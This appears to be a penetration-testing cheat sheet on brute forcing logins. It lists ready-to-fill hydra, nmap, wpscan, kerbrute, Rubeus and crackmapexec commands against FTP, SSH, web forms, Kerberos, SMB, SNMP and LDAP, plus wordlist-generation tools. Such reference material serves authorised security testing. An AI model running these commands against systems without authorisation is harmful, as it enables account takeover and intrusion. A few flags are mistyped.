Brute Forcing
One way to gain access to a company's website, service, infrastructure, computers... can be achieved using default credentials or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".
Many web applications, services, and devices have a default administrator account with a default password. However, the password might not have been changed after the device was set up. This is an opportunity for the attacker to obtain the default credentials for the technology to gain access.
Try to identify the software, find whether it uses default passwords and if so, what they are:
- Search for "<SOFTWARE> default password".
- Try the same user as the password.
- Review the documentation.
- Review the source code, if available.
- Check for default credentials databases:
In case the default credentials for the target did not work, an attacker could use already existing dictionaries with default passwords or craft a dictionary based on the password policies of the targeted company.
There are already built dictionaries with thousands of passwords.
Based on the information of the target we can craft personalized dictionaries. Moreover, there are tools that can facilitate the attacker the work.
- Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.
cewl <URL> --with-numbers -n -m 5 -d 3 -w output.txt
- Crunch: you can specify a character set, and it will generate a huge number of permutations using the characters you specify.
# Generate a combination with a set of alphanumeric characters
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789
- Cupp: Generates passwords based on provided keywords about the target.
cupp -i
This subsection contains commands to perform brute force attacks on different technologies.
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT>] | -p <PASSWORD>} ftp://<TARGET>
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}" <TARGET>
An attacker could encounter different login portals during a web analysis that can be brute-forced.
hydra -I {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} -f <IP> -s <PORT> http-get <URL>
hydra {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} <TARGET> -V http-form-post '<ENDPOINT>:<usernam=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS M'
Note: Nowadays, hydra does not support forms with CRFS tokens. Thus, a solution would be to use Burp Suite.
wpscan --url <WORDPRESS_URL> –-passwords <WORDLIST.TXT> -–usernames <USERS.TXT> -–max-threads <NUMBER_THREADS>
There are several ways to perform a brute-force attack against a Kerberos service.
# with a list of users
python kerbrute.py -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users: <USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>
nmap -n -p110 --script pop3-brute <TARGET>
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V
First of all, check the passwords policy to avoid banning accounts.
crackmapexec smb <IP> --pas-pol
Then, you can brute-forcing with the following tools.
crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>
You can brute force SNMP community strings with hydra.
hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp
Attempts to brute-force LDAP authentication. By default, it uses the built-in username and password lists. In order to use your own lists use the
userdb
and passdb
script arguments.nmap --script ldap-brute -p 389 <IP>
Another option is to use hydra.
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>
Last modified 1yr ago